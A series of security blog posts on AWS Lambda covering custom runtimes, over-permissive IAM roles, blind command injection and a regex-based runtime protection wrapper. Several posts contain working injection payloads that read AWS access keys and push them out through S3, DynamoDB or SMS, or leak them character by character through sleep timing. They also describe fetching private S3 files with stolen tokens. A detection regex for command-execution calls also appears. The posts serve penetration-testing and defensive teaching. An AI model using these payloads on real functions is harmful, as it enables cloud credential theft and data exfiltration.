Working of Lambda Layers and Runtime

Amazon came up with many innovative and interesting announcements about new technologies and services provided by them during the recent AWS "re:Invent" event. One of the widely discussed topic in the event was "serverless". With the increasing usage of AWS lambda, it is imperative to understand anything that impacts the lambda architecture in any way. The below two announcements were quite important for security professionals as they directly deal with serverless changes and its implications.

Firecracker - Firecracker is Amazon’s micro VM, which runs lambda functions, and it will be open source. Hence, anybody can play around and understand it's working. For more details: -

Lambda Layers and Runtime APIs - Lambda functions allow a holding place in terms of layers. One can deploy set of layers and can execute these layers with Runtime APIs or leverage packages deployed in these layers. For more details: -

In this post, we are going to explore Layers and Runtime APIs.

AWS was supporting a set of runtime environment predefined within lambda functions. With the introduction of Layers and Runtime APIs, that it no longer a limitation. It now supports and allows to load one's own runtime binaries and leverage it across the lambda eco-system. Thus, now support has been added for Ruby, C++, and Rust etc. making it a Bring Your Own Runtime kind of scenario.

Their tutorial ( explains how to configure and invoke one's own runtime through layering and APIs. We are going to modify the scripts mentioned in this tutorial and deploy our runtime through the management console for better understanding.

First, we need to make our own bootstrap to start the activity of lambda functions within shell.  This is the shell script which one can run and initiate any environment and binaries within it. It supports runtime APIs so one can fetch the "event" and pass it to lambda handler.

Here is the sample bootstrap script: -



set -euo pipefail

# Initialization - load function handler
echo $_HANDLER >> /tmp/dump
env >> /tmp/dump
source $LAMBDA_TASK_ROOT/"$(echo $_HANDLER | cut -d. -f1).sh"

# Processing
while true
  # Get an event
  EVENT_DATA=$(curl -sS -LD "$HEADERS" -X GET "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
  cat $HEADERS >> /tmp/dump
  echo $EVENT_DATA >> /tmp/dump
  REQUEST_ID=$(grep -Fi Lambda-Runtime-Aws-Request-Id "$HEADERS" | tr -d '[:space:]' | cut -d: -f2)
  echo $REQUEST_ID >> /tmp/dump
  # Execute the handler function from the script
  RESPONSE=$($(echo "$_HANDLER" | cut -d. -f2) "$EVENT_DATA")

  # Send the response
  curl -X POST "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/$REQUEST_ID/response"  -d "$RESPONSE"

Let’s look at few important lines: -

1.    We are using /tmp/dump to put interesting values to it so we can read them through the function and pass it back as response as well.
2.    "EVENT_DATA=$(curl -sS -LD "$HEADERS" -X GET "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")" – this line will fetch "event" through runtime from underlying localhost (
3.    "RESPONSE=$($(echo "$_HANDLER" | cut -d. -f2) "$EVENT_DATA")" – once we have "event" with us we can invoke our own local function and fetch the response. It is like calling another script or you can pass it to any other runtime binaries.
4.    Finally, "curl -X POST "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/$REQUEST_ID/response"  -d "$RESPONSE" – we send response back to the client through runtime API.

We just have to make sure these files are "chmod 755" as shown below: -

We can zip the file to "" and create a new layer for lambda.


We can upload the zip file and create a runtime layer as below: -

Now, we have runtime-shell layer read. We can utilize this layer/runtime and build many lambda functions using simple shell scripts. Let’s make a function here called "runlambda": -


We select "custom runtime" as our environment. Next, let’s load the layer which we want to use: -

As shown in the above screenshot, we pass on ARN to the layer and then it is ready: -

Next, let’s load simple echo function as below ( We are doing simple cat to the entire dump we collected in the bootstrap along with the event.

function handler () {
  echo "$EVENT_DATA" 1>&2;
  cat /tmp/dump
  RESPONSE="Echoing request: '$EVENT_DATA'"
  echo $RESPONSE

Next, we can load this function as zip to the lambda function as shown below: -

All set! We can invoke the function as below: -


We can also invoke the function through our script ( as below: -


We are getting a dump of all the variables available in the bootstrap layer: -


Above, we have cURL calls made to APIs.

Finally, we have echo coming back from the function itself.


Lambda Layers and Runtime APIs enable the use of binaries or shell scripts as well as our choice of programming languages. Moreover, one can centrally manage common components across multiple functions enabling better code reuse. This implementation will have its own set of security concerns as well – thus making it necessary to understand the customized layers and runtime APIs before evaluating the function from a security standpoint.

Article by Amish Shah & Shreeraj Shah

Lambda Post Exploitation – Devil in the Permission

In the last blog post, we covered an exploit scenario where an attacker could get access to all the resources which were part of the AWS account once a vulnerability was identified in a lambda function. A weak implementation of permission controls led to the above mentioned exploit scenario. We concluded the following: -

“The permission controls implemented for lambda functions may not seem critical while executing the lambda function stand-alone or by looking at the features or from a developer standpoint but it might turn out to be catastrophic for the overall AWS infrastructure because of a combination of vulnerabilities.  It would not only lead to a compromise of the lambda function or backend details but would impact the overall application residing on that particular account. Who knows? – An attacker may end up getting access to secret buckets, sensitive DynamoDB tables, EC2 backups and files etc. Thus, permission controls should be well implemented across the complete infrastructure and not stand-alone lambda functions. We will cover more on permission structures and issues in the coming blog posts.”

All AWS resources (including lambda functions) are owned by an AWS account, and permissions to access these resources are decided through permission policies. It is necessary to understand these permission models and grant proper permissions for all resources. A detailed explanation of AWS permissions is available here: -

In our case, the following diagram shows the implementation of the lambda function: -

Let's look at the permission for the target function. We can quickly run our enumeration utility and extract important information about the function as below: -

bliss$python3 -f processInvoice

enumLambda - Lambda Function Enumeration Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+) Fetching Lambda function processInvoice...
       (+) Platform: python3.6
       (+) Permission: arn:aws:iam::313588302550:role/lambda+s3+dynamo
       (+) Permission Policy: lambda+s3+dynamo
        ==> [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]
        ==> [{"Effect": "Allow", "Action": ["dynamodb:DescribeStream", "dynamodb:GetRecords", "dynamodb:GetShardIterator", "dynamodb:ListStreams", "logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"}]
        ==> [{"Effect": "Allow", "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"}]
       (+) xRay-Tracing: PassThrough
       (+) Code-Location:
---Function Mapping---
[{'UUID': '7dbec14c-64ce-00e5-92ae-465057ccb435', 'BatchSize': 10, 'EventSourceArn': 'arn:aws:sqs:us-east-2:313588302550:processInvoice', 'FunctionArn': 'arn:aws:lambda:us-east-2:313588302550:function:processInvoice', 'LastModified': datetime.datetime(2018, 8, 14, 11, 7, 44, 705000, tzinfo=tzlocal()), 'State': 'Enabled', 'StateTransitionReason': 'USER_INITIATED'}]
---Function Policy---
    (-)Error: An error occurred (ResourceNotFoundException) when calling the GetPolicy operation: The resource you requested does not exist.

We are interested in the permissions assigned to the execution role for the lambda function. It is as below: -

 (+) Permission Policy: lambda+s3+dynamo
        ==> [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]
        ==> [{"Effect": "Allow", "Action": ["dynamodb:DescribeStream", "dynamodb:GetRecords", "dynamodb:GetShardIterator", "dynamodb:ListStreams", "logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"}]
        ==> [{"Effect": "Allow", "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"}]

Here, S3 is completely accessible both in terms of "Action" as well as "Resource": –

{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}

Wildcard "*" implies full access, which means that we can access content of all S3 buckets within the account. In the last post, we saw the below script, which concluded the same thing.

The same law is applicable to DynamoDB since it has similar blocks of permissions assigned.

Here is a simple way to identify permission issues through the script from the lambdaScanner toolkit.


The implementation and assignment of permission controls should be decided properly before the deployment of lambda functions. The permissions should be limited to the use cases – if a lambda function needs access to one S3 bucket with only read functionality, then both its "Action" and "Resource" should be defined accordingly. When "*" is assigned, it would lead to complete access of resources – which would be a critical exploit scenario leading to hijacking of all resources of the account. To avoid or limit this damage, it is imperative to do proper permission modelling of the resources. Though, the first step to security is not to have any vulnerability in the lambda function which can lead to such exploit scenarios. For such security, it is necessary to do input validation before the event stream is consumed by the lambda function.

Article by Amish Shah & Shreeraj Shah

Blind Lambda Event Injections without Outbound Connections (Part 3) – Extracting AWS Building Blocks

Lambda functions, integrated with various AWS components according to the design of serverless applications, can be a medium of various exploit scenarios if vulnerable. As discussed in the previous blog posts, a vulnerability in a lambda function (with or without outbound connections) can be identified through various methods. In this blog post, we will discuss the exploit scenarios which come into play once the vulnerability in the lambda function has been identified. Below are two major exploit area's: -

1.    Exploiting Backend – We use different methods (enumeration, tracing, fuzzing etc.) to identify that the lambda function is vulnerable to SQL injection. Once the vulnerability is identified, we inject attacks to exploit the vulnerability and fetch information about the back-end database, its tables etc. In this scenario, we are just leveraging and exploiting the weakness of the lambda function and not touching any other components in the overall infrastructure design.

2.    Exploiting AWS Components – We use different methods (enumeration, tracing, fuzzing etc.) to identify the overall architecture and information about the components integrated with serverless functions. Once the vulnerability is identified (for example command injection), we inject payloads to exploit the vulnerability and steal critical information like access keys/tokens/secret etc. Using this information we can try and access other components like S3 buckets in the serverless infrastructure (assuming that the infrastructure has poor permission controls). We will look at an exploit scenario that would arise by the combination of these two vulnerabilities – injection + poor permission controls.

Of course, there can be other areas beyond the ones mentioned above, which can also be exploited through leveraging information leaked from lambda functions.

Let’s take a simple use case that we used in a previous blog: - There is an invoice processing system where a user submits an invoice (by uploading a file, providing the file name, other basic information etc.) through an API gateway. Some activities are then triggered across other AWS components like S3 and DynamoDB and the message to queue the invoice processing gets posted to Amazon SQS service for asynchronous processing.

As discussed in the previous blog, when the lambda function is vulnerable to command injection, the function allows to extract parameters from the shell in which the lambda function is running. An attacker can simply inject a payload to set or extract environment variables and fetch the below parameters from shell: -


It is possible to extract these parameters via vulnerable lambda functions (with and without outbound connections).
Without outbound connection (here)
With outbound connection (here)

It is also imperative to understand permission structure of the lambda function within AWS. These three parameters hold a key, which can be considered as a permission token. Whatever permission is assigned to the lambda function is mapped to these tokens "temporarily". The tokens might be valid for few hours, after which they are refreshed – once refreshed, the tokens need to be grabbed again.

In this case, the lambda function interacts with AWS S3 (Bucket 1) as shown in the above figure. We do not know the permission controls implemented for the lambda function and S3 resources. We execute the below script (the tokens fetched above are passed for authentication/authorization purposes) to enumerate S3 buckets and their content for this account and find out: -

Bingo! As we can see below, we were able to list all S3 buckets and their content. Why? It seems that the lambda function might have access to all S3 buckets.

Further, we can now enumerate and fetch secret files from inside the buckets. We can even end up writing to the buckets, depending on the permissions. Let’s try to fetch a file using the below script: -


The above script establishes a connection with the extracted tokens and tries to fetch the file.

We are also successful in fetching the file. This file should not be accessible to us but we end up having it.

Hence, here we are successful in exploiting the vulnerability due to poor permission controls.



The permission controls implemented for lambda functions may not seem critical while executing the lambda function stand-alone or by looking at the features or from a developer standpoint but it might turn out to be catastrophic for the overall AWS infrastructure because of a combination of vulnerabilities.  It would not only lead to a compromise of the lambda function or backend details but would impact the overall application residing on that particular account. Who knows? – An attacker may end up getting access to secret buckets, sensitive DynamoDB tables, EC2 backups and files etc. Thus, permission controls should be well implemented across the complete infrastructure and not stand-alone lambda functions. We will cover more on permission structures and issues in the coming blog posts.

Article by Amish Shah & Shreeraj Shah

Blind Lambda Event Injections without Outbound Connections (Part 2)

In the previous blog post (here), we covered a simple technique to both discover and exploit serverless/lambda functions at blind spots without outbound connections in place. We concluded the following at the end of the article: - “It is imperative to identify injection points and fix the vulnerabilities at the source rather than relying on deploying ‘post exploitation’ solutions like blocking traffic or other OS level calls. Once a vulnerability is identified, an attacker can always find ways to mount attacks and exploit the identified vulnerability.”

As we have seen earlier, lambda functions, which are integrated in serverless applications, are not usually isolated and consume events from various components like Amazon S3, DynamoDB, SNS etc. as shown in the below figure. In this article, we will look into how an attacker can leverage serverless applications and components integrated to the functions to fetch information and detect vulnerabilities in spite of blocked outbound connections.


For this scenario, let's assume that the lambda function is integrated with various Amazon components according to the design pattern of serverless applications. We can enumerate the lambda function and identify which components are integrated with the function (an outbound connection is not required). Once the component is identified, we can use customized payloads according to the component for various use cases and check the results.

We have the following code in place – which processes the 'exec' command for fetching 'key3'. We are blindly checking for a command execution vulnerability in this piece of code, where the lambda function does not have any outbound connection.

def lambda_handler(event, context):



We will be passing the below payload or stream to the function in a normal scenario: -


"key3": "3";


Let’s take different use cases/design patterns for serverless applications and see how it can be leveraged during post exploitation.

Writing to Amazon S3

We can inject the below payload and push environment variables to the known-bucket. We can say that the command is successfully executed if the variables are written and we can read them all (no outbound connection is required).


"key3": "3; a = os.environ; import boto3; s3 = boto3.client('s3'); s3.put_object(Bucket=’known-bucket', Key=’known-bucket’, Body=str(a))",


Writing to Amazon DynamoDB

In the same manner as above, we can inject the below payload and check for successful execution of the command if the environment variables are written to the known-and accessible dynamodb (access via some other use case).


 "key3": "3; a = os.environ; import boto3; ddb = boto3.resource('dynamodb'); table = ddb.Table('known-location'); table.put_item(Item={'LocationId':4, 'Data': str(a)})",


Sending via SMS

We can inject the below payload and push environment variable like "access key" via SMS service to a specific number (no outbound connection is required)


 "key3": "3; a = os.environ['AWS_ACCESS_KEY_ID']; b = os.environ['AWS_SECRET_ACCESS_KEY']; import boto3; snsmsg = boto3.client('sns'); snsmsg.set_sms_attributes(attributes={'DefaultSMSType': 'Transactional'}); snsmsg.publish(PhoneNumber='+NUMBER’, Message=str(a+':'+b))",



We discussed three use cases in this post, but there might be more since lambda functions need to interact with several components across the AWS eco-system. The best practice to fix vulnerabilities is by resolving the vulnerabilities with secure coding practices and protecting against incoming malicious event streams. "Post-exploitation" solutions end up providing a sense-of-security but are not reliable defense solutions for protecting lambda functions.

Article by Amish Shah & Shreeraj Shah

Blind Lambda Event Injections without Outbound Connections

Serverless functions, like AWS Lambda, have similar injection opportunities as in traditional applications, API's and other components. It is usually difficult to identify blind spots and exploit this kind of vulnerabilities, though there are various tools and methods available to identify these blind spots. The most common methods to identify these issues are timing attacks and logical deduction scenarios using AND/OR operators. In many cases, we inject payloads which create an outbound connection and send data back to us through some channel. This kind of scenario confirms the vulnerability and can be exploited further. But there are cases where outbound connections are blocked, and the application does not send any clue in the response for identification of the vulnerability; which makes it a blind spot. The below image shows both the scenarios: -


Here is an example that we covered in an earlier post (here), where we injected a payload in the event stream of the lambda function and harvested the access key using an outbound connection.


Now, let's assume that we don't have this outbound connection in place. The lambda function blocks the connection. Not allowing an outbound connection can be considered as obfuscation and sense-of-security in place. It is possible to identify and exploit this type of scenario by considering it as a blind spot. Let’s try a timing attack to identify the spot and logical deduction to exploit the scenario.

We make a simple invocation to the function with a legitimate request as shown below: -

  "Records": [
      "body": "invoice-98790",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      "messageAttributes": {}

When we invoke the function we get the following response: -

bliss$python3 -i -f processInvoice -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 72808401-cea9-11e8-903a-4506277d6e70
    (-) Response ==>
    (-) "Invoice processing done!"
    (-) Log ==>START RequestId: 72808401-cea9-11e8-903a-4506277d6e70 Version: $LATEST
END RequestId: 72808401-cea9-11e8-903a-4506277d6e70
REPORT RequestId: 72808401-cea9-11e8-903a-4506277d6e70    Duration: 56.36 ms    Billed Duration: 100 ms     Memory Size: 128 MB    Max Memory Used: 26 MB 

The above response shows that the time for this execution is Duration: 56.36 ms.

Now let us try to inject simple sleep command and see the variation in response time.

  "Records": [
      "body": "invoice-98790;sleep 1",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      "messageAttributes": {}

We have put sleep of "1" second here in the payload ("body": "invoice-98790;sleep 1",)
We get the following response after invoking the function: -

bliss$python3 -i -f processInvoice -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 58d200b7-ceaa-11e8-88c6-675555b6bf64
    (-) Response ==>
    (-) "Invoice processing done!"
    (-) Log ==>START RequestId: 58d200b7-ceaa-11e8-88c6-675555b6bf64 Version: $LATEST
END RequestId: 58d200b7-ceaa-11e8-88c6-675555b6bf64
REPORT RequestId: 58d200b7-ceaa-11e8-88c6-675555b6bf64    Duration: 1123.26 ms    Billed Duration: 1200 ms     Memory Size: 128 MB    Max Memory Used: 26 MB

Here, we can see that it took almost 1 second more in responding back (Duration: 1123.26 ms). Hence, we can easily deduce that there is a blind spot and go on with playing around this vulnerability.

Since we don’t have an outbound connection in place, how we can get hold of the AWS key like we got using curl in previous case? Hence, we need to deploy a deduction technique and try to fetch it with multiple attempts.

Let’s try that out with the following payload in the body: -

invoice-98790;foo=`echo $AWS_ACCESS_KEY_ID|cut -b 1`;if [ $foo == 'A' ]; then sleep 1; fi

Here, we are getting first character of the key and comparing it with 'A'. If it matches then we should get a sleep of 1 second else response should take regular time.

Let’s pass this message and invoke the function.

  "Records": [
      "body": "invoice-98790;foo=`echo $AWS_ACCESS_KEY_ID|cut -b 1`;if [ $foo == 'A' ]; then sleep 1; fi",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      "messageAttributes": {}

We get the following output after invocation: -

bliss$python3 -i -f processInvoice -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 67b0f5c9-ceab-11e8-9576-0ff8426cf2fc
    (-) Response ==>
    (-) "Invoice processing done!"
    (-) Log ==>START RequestId: 67b0f5c9-ceab-11e8-9576-0ff8426cf2fc Version: $LATEST
END RequestId: 67b0f5c9-ceab-11e8-9576-0ff8426cf2fc
REPORT RequestId: 67b0f5c9-ceab-11e8-9576-0ff8426cf2fc    Duration: 1108.62 ms    Billed Duration: 1200 ms     Memory Size: 128 MB    Max Memory Used: 26 MB  

Bingo! As you can see we actually got a proper delay of 1 second (Duration: 1108.62 ms) in this case. Hence, we can say that the first character of the AWS key is indeed 'A'.

To verify, let’s send the same request with character 'B' as below: -

  "Records": [
      "body": "invoice-98790;foo=`echo $AWS_ACCESS_KEY_ID|cut -b 1`;if [ $foo == 'B' ]; then sleep 1; fi",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      "messageAttributes": {}

We get the following response: -

bliss$python3 -i -f processInvoice -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> becf34b6-ceab-11e8-aeb2-17378d1ed705
    (-) Response ==>
    (-) "Invoice processing done!"
    (-) Log ==>START RequestId: becf34b6-ceab-11e8-aeb2-17378d1ed705 Version: $LATEST
END RequestId: becf34b6-ceab-11e8-aeb2-17378d1ed705
REPORT RequestId: becf34b6-ceab-11e8-aeb2-17378d1ed705    Duration: 106.76 ms    Billed Duration: 200 ms     Memory Size: 128 MB    Max Memory Used: 27 MB   

In this case response time is far less, approximately 1 second less (Duration: 106.76 ms). Hence, we can conclude that the value of the first character is 'A' and not any other.

This way we can send multiple requests and harvest full value of the AWS key without any outbound connection.


It is imperative to identify injection points and fix the vulnerabilities at the source rather than relying on deploying "post exploitation" solutions like blocking traffic or other OS level calls. Once a vulnerability is identified, an attacker can always find ways to mount attacks and exploit the identified vulnerability.

Article by Amish Shah & Shreeraj Shah

Runtime Lambda Protection (Part 3) – "Self-Inspection"

Serverless functions, like AWS Lambda, are uniquely placed and transient in nature. These functions need a non-standard approach for both pentesting as well as defense. In the past blogs, we have covered the following two aspects for protecting lambda functions using the 'protectLambda' utility of the 'lambdaScanner' toolkit (can be downloaded from here).

1.    Runtime Lambda Protection – "Self Defense" from Inside (here)
2.    Runtime Lambda Protection (Part 2) – Monitoring, Analytics and Alerts (Real-Time) (here)

In this blog, we will be describing an enhancement of the 'protectLambda' utility through which we can validate the code of the lambda function just before its execution and allow/deny the execution of the function on the results of this validation. We can define a regular expression to check for loopholes in the code of the lambda function – every time the code would be checked against this regex and the execution of the function would be denied if a security violation is detected in the code. Below is a basic diagram of how the module of the 'protectLambda' utility will be placed in the overall architecture of the application; right before the execution of the function.



Leveraging "code_protect" Module:

In order to leverage this module, one needs to include the 'protectLambda' utility to their project. 'protectLambda' will wrap around the lambda function and monitor both incoming events as well as outgoing steams (described in earlier blog posts) and check the code of the function, at runtime, before its execution. This can be achieved by defining a regex in the file called "code_protect.txt" as shown in the figure below: -

One can define a set of rules, via regex, which will get validated before execution of the function at runtime. Hence, it will be like performing SAST at runtime.

For example, we define the following rule in "code_protect.txt": -


This rule will not allow the developer to use API/code, which can be used to run underlying command execution. We are covering most of the combinations of calls via above regular expression.

Let’s assume we have a function where developer is using the following line of code.

filetype = subprocess.check_output(command,shell=True).decode("utf-8")

Now, we have added the 'protectLambda' utility to the lambda function as shown below: -


If we try to invoke the lambda function now, we will get the following response: -

"Security Violation..."

Request ID:

Function Logs:
START RequestId: e9b59241-cbb5-11e8-ac44-058b44f83258 Version: $LATEST
Code Rule violation for  .*(call|check_output|system|popen|run|local|spawn).*\(.*
END RequestId: e9b59241-cbb5-11e8-ac44-058b44f83258
REPORT RequestId: e9b59241-cbb5-11e8-ac44-058b44f83258    Duration: 88.89 ms    Billed Duration: 100 ms     Memory Size: 128 MB    Max Memory Used: 22 MB  

Outcome/response of the function execution was as below: -

"Security Violation..."

We got a security violation alert since the developer has violated the rules of coding (according to the defined regex) and dangerous APIs/calls are used. In this case, we will also see the following line in the log: -

START RequestId: e9b59241-cbb5-11e8-ac44-058b44f83258 Version: $LATEST
Code Rule Violation for .*(call|check_output|system|popen|run|local|spawn).*\(.*

In this way, the 'protectLambda' utility protects the execution of the function if the code is vulnerable using the rules defined through "code_protect.txt". Similar protection for the incoming event stream and outgoing responses through "in_protect.txt" and "out_protect.txt" respectively was discussed in an earlier blog post.


The nature of lambda functions and the method through which the functions are triggered make the traditional defense solutions inappropriate for serverless functions. So, as the first line of defense, the 'protectLambda' utility can guard against the code of the function, incoming stream of events as well as outgoing responses through a pre-defined set of rules. This defense technique along with a proper logging and monitoring mechanism would be a comprehensive approach for the protection of lambda functions at run-time.

Article by Amish Shah and Shreeraj Shah

Runtime Lambda Protection (Part 2) – Monitoring, Analytics and Alerts (Real-Time)

In the last blog, we discussed about how traditional defense solutions are not sufficient for protection of lambda functions and how 'protectlambda', a small utility from the 'lambdaScanner' toolkit, can be used to guard incoming as well as outgoing stream through a set of predefined rules. Please refer to (here) for more details. 

In this blog post, we are going to build over the 'protectLambda' function to set up a strong real time monitoring, analytics and alerts capability using Amazon CloudWatch. Amazon CloudWatch, a component of AWS that collects monitoring and operational data in form of logs, metrics, graphs and events, provides a unified view for AWS resources and applications running on AWS infrastructure. Moreover, CloudWatch allows to customize and set filters, triggers, alarms to troubleshoot issues and take automated actions. As shown in the below figure, all these functionalities can be leveraged to set up real time analysis of the lambda functions.

As discussed in the last blog post, we can introduce the 'protectLambda' utility for lambda functions, define a set of rules for the event stream and the outgoing stream and then monitor and track the logs for rule violations using CloudWatch. A customized dashboard can be created to monitor logs based on filters, correlate logs and metrics, view data in graphs and set alerts with CloudWatch alarms. This dashboard can then be leveraged for real time monitoring of the attacks on lambda functions and for checking how these attacks are blocked by the 'protectLambda' utility. Alarms and notifications can be configured to inform the team of attack on lambda functions and violations of pre-defined rules.

Below is an example for creating a dashboard by defining basic filters, graphs and alarms: -

1.    Setting up Metric Filters on lambda function logs

We can define filters, using the Logs Metric Filter, for specific log groups. In this case, we are creating a filter for the records logged from the 'protectLambda' function (the function added to protect the incoming and outgoing stream of the lambda functions through a set of predefined rules). The 'protectLambda' function blocks the event stream and outgoing response according to a defined regex and logs a "Violation" entry as and when it blocks something. Thus, we define a filter for the word "Violation" which will keep tracking for the word "violation" in this group of logs. This metrics can later be plotted on a graph.


2.    Build Dashboard and Graphs

The metrics from the above filter can be plotted on a graph as shown below. The graph show the number of instances of violations defended by the 'protectLambda' utility.

3.    Setup Alarms, Alerts and Notification

We can create attack notification alarms for the created metric filters as shown below. In this case, we have created an alarm for the filter 'protectLambda' which looks for the word "violation" in the selected log group.

We can define a rule where an alarm notification will be triggered as soon as we get one instance of attack in a specific window of 5 minutes.


Thus, we can see that as soon as a lambda function is attacked and 'protectLambda' defends an attack on the function we get a notification on our dashboard.


We can also configure to receive these notifications in email or on the CloudWatch mobile application as shown below.

(email notification and alert)

(mobile app)
Looking at the inbuilt capabilities of CloudWatch, there is no need to set up and create a dashboard on a different domain. The provided functionalities can be easily leveraged to monitor the lambda functions, analyse logs in real time and in turn perform the required actions depending on the analysis.

Runtime Lambda Protection – "Self Defense" from Inside


Serverless functions, like AWS Lambda, are transient, temporary and do not have traditional defenses like WAF/IPS/IDS/RASP. Moreover, these functions are not always invoked through API gateway over HTTP(S), where one can provide defenses like WAF to filter for malicious payloads. Lambda functions consume “events” coming from various sources like S3, DynamoDB, SQS etc. (as shown in the below figure). Hence, there are no frontline defenses for these functions. These functions must be protected from "inside" rather than having defenses from outside. They should have self-defense abilities embedded in the function itself.  In this blog, we are going to cover this type of self-defending techniques for Lambda functions.

Problem & Challenges:

Lambda functions have two important aspects – "event consumption" and "response to specific events". It is imperative to build strong event processing and filtering capabilities before the event stream (payload) hits the actual function. Hence, if any malicious payload is being injected to the stream then it gets isolated and disconnected from actual lambda function. This is the first and foremost defense one needs to provide to the lambda function, from inside without trusting any outside defenses.

Secondly, in cases where an attack is successful and the functions are compromised, it may lead to sensitive data disclosure through "outgoing stream". These outgoing responses and streams must be protected and blocked from "inside". A "post exploitation" scenario would include permission controls, invoking other channels like pushing data out on a network, spinning another process to advantage etc., providing controls for “post exploitation” scenario would be not fruitful and can be bypassed in some cases. One should be focused on securing the event stream rather than waiting for the exploit to hit the function. We have seen many defensive controls come into play during exploitation phase and they can be bypassed in one or the other way. Hence, it is always advisable to protect the function from inside, for vulnerabilities, rather than taking care of exploit scenarios.



One can achieve protection for the event stream as well as outgoing stream information leakage by wrapping lambda function without changing the actual code. It is very simple - one can use a regex to build effective rules to guard against known vulnerabilities. The same wrapping code can be used to enhance and build many other validations like data type, length, characters etc. Also, as an extra defense one can block all possible patterns of malicious payloads which are well known for years.

Introducing 'protectLambda':

As part of the 'lambdaScanner' toolkit (for python), there is a small utility called 'protectLambda'. It helps in building a solid defense against vulnerabilities, by leveraging regex, in a simple and effective way. The working of the 'protectLambda' function is shown in the below figure. 'protectLambda' sits before the actual lambda function and keeps a watch on both incoming and outgoing streams. One can have a predefined set of rules in place and based on those rules, any attack coming to the lambda function would get blocked.


Let’s look at its implementation. One can leverage this utility or build a similar component for lambda functions. This same idea can be applied to other lambda technology stacks as well.

Vulnerable Lambda Function and Command Injection:

Here is an invoice processing system, which is taking event from SQS in the below format (let’s store it in the "event.txt" file). This SQS message is coming through the end user through various different applications as described in previous blogs.

  "Records": [
      "body": "invoice-98790",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      "messageAttributes": {}

We can invoke this function by using the 'scanLambda' component from the 'lambdaScanner' toolkit or by any other means.

bliss$python3 -i -f protect -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 53fd2b95-b331-11e8-866c-07f43ff67f8a
    (-) Response ==>
    (-) "Invoice processing done! [Debug:./tmp/invoice-98790: ASCII text, with no line terminators\n]"
    (-) Log ==>START RequestId: 53fd2b95-b331-11e8-866c-07f43ff67f8a Version: $LATEST
END RequestId: 53fd2b95-b331-11e8-866c-07f43ff67f8a
REPORT RequestId: 53fd2b95-b331-11e8-866c-07f43ff67f8a    Duration: 74.64 ms    Billed Duration: 100 ms     Memory Size: 128 MB    Max Memory Used: 22 MB    

Following line is the response from the function: -

(-) "Invoice processing done! [Debug:./tmp/invoice-98790: ASCII text, with no line terminators\n]"

